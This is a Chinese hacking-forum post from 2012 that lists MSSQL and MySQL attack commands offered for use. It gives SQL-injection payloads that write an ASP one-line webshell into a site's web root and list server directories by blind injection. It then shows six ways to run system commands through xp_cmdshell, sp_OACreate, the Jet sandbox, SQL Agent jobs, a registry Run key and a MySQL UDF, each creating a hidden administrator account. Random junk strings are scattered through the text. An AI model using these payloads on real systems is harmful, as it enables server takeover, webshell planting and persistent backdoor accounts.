找回密码
 立即注册
查看: 3698|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
5 x" d7 y3 |' M, M7 Z% }: ~3 i首先确定网站的WEB路径
% G( D& g, p& T4 ~: G;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
8 \6 s. G- V% s1 A7 |2 u. Q: f% ?1 @; ^4 r
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
- t3 \; r, L6 ?//将一句话木马插入表中
' ^; D1 m1 V/ z
$ v. `0 X* i+ b! \- r  q; K3 w;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- / v  G2 u5 ]; J4 I* \& _6 o/ c
//导出一个ASP文件
8 O8 m  F3 s- x- F, f& z) n$ P7 D: {6 C! F: W0 D. n( U
4 b$ b" q& e- M9 m' a  i0 Z
关于MSSQL列目录5 t6 W' N" W+ l- F+ f
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表0 p) b& Q* I4 c( E# C
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
0 C3 p$ _! h  Q; p" `# n3 [, |+ h2 C+ A. x; I0 a
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
  E% q3 ]- m9 w: {& ]/ G. G' l
$ G* F% e* ^/ H  v- JAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段% P* ?6 h7 e/ ^% `3 Y0 E! ~
1 U2 n; Q" ^5 j% b, C0 e
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
9 c. I' ]' W' x% i+ e8 ~# N. S
7 n; L) H0 g; ^2 \8 I
  W, }$ Q* `) l: ?" O# G数据库版本和权限查看
# u$ {( ?1 D" m" land 1=(select @@VERSION) //查看详细的数据库信息.: s' G) n5 H; z! T8 h
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA& g3 q) I* k8 M1 y  V5 C
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER7 R7 X3 B4 O: j& H- s; s
$ h/ ^+ L  O% j/ G- l
8 E: f2 F! [4 e" ?8 p# A( z: p& {7 K6 E
1.利用xp_cmdshell执行命令
2 u- I0 y/ t7 [+ \! o1 Oexec master..xp_cmdshell 'net user rfire 123456 /add'
- L$ |: k0 G! c2 s& n" Sexec master..xp_cmdshell 'net localgroup administrators rfire /add'  ]- ]. G/ V" S" d6 s
" k  M# A( Z% l
恢复xp_cmdshell存储过程
1 \9 A+ H  r& C2 \" e/ b0 V# a1 rExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- h& b, G6 f$ n& {7 [: U3 F
5 f( c3 O. t, T3 |" t
. ^* K' W9 B: d" c) M
2.利用SP_OAcreate和SP_OAMETHOD执行命令; z. ~2 o8 v* r9 c
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
0 k! w, V( X# R2 s0 |. d7 MDECLARE @shell INT //建立一个@shell实体3 M% ^5 r/ k' H% U4 w9 T
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例3 @5 I* ]6 Q2 b
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
0 y# H/ y3 B" h- Y9 W+ C0 N$ J- C( k. h
% j9 B' t5 L! }- ^0 ?2 ?3 L
3.利用沙盒模式2 }: B. ?9 Z3 B- O! q  F
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
$ R4 f- m# ~# ]开启沙盒模式:
( m- Z" p2 v8 m& w( I: g4 eEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
7 ?* r+ q) ?& g( d# o4 v; B, A" [. a6 V+ ?9 n% {
执行命令:
: a* J7 Y5 Q9 |" ~! z. xSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
) k3 ^9 @: c1 t5 k0 r. y# ]
# ?% f/ ]4 D& q
( [9 ~# `, W. g& r* A) G  e4.利用SQL代理执行命令, {0 `. X7 _: E8 W0 P& F+ L
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
# b8 R1 s$ [8 O1 e4 T
# m' O3 m4 }5 V: j( s执行命令:  Y8 C7 ?/ q  k  c! B" g6 C0 I
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错, e5 `; F  k5 M0 t: j. R
exec sp_add_job 'x'
2 Y5 ^# R! y; _2 v) D- cexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
& B3 r* p* h8 Q2 U6 q( [8 r9 rexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
5 |" M0 I. v; E  t( T$ p
  N8 Z' S5 [( m8 h4 S, G# O! o6 m/ v, I6 W/ e1 s5 r( R- }
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)/ O7 D2 \( H& j9 o8 |# e
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
) e4 ~3 g& n1 b7 e' d7 U) m8 j$ Y8 Y* E- _! q! s
. B8 B" A& R: u! P6 v& @
6.MYSQL的命令执行
- f. Q0 l$ R7 Y: U. JMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
+ O; P* a$ Y2 R( x8 s首先要在su.php下导出c:\windows\udf.dll
- Z+ H+ K" c8 }导出后执行创建自定义函数命令:
! i: `+ c5 `( r$ g4 I5 qCreate Function cmdshell returns string soname 'udf.dll'
% |. B/ V" C. `4 B, ^1 b1 \3 `执行命令
! H/ _/ q  t- ]% D$ rselect cmdshell('net user rfire 123456 /add')9 _1 {. T) x% s1 T0 }7 e
执行后删除函数 drop function cmdshell7 W6 S3 ?+ v9 Q7 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表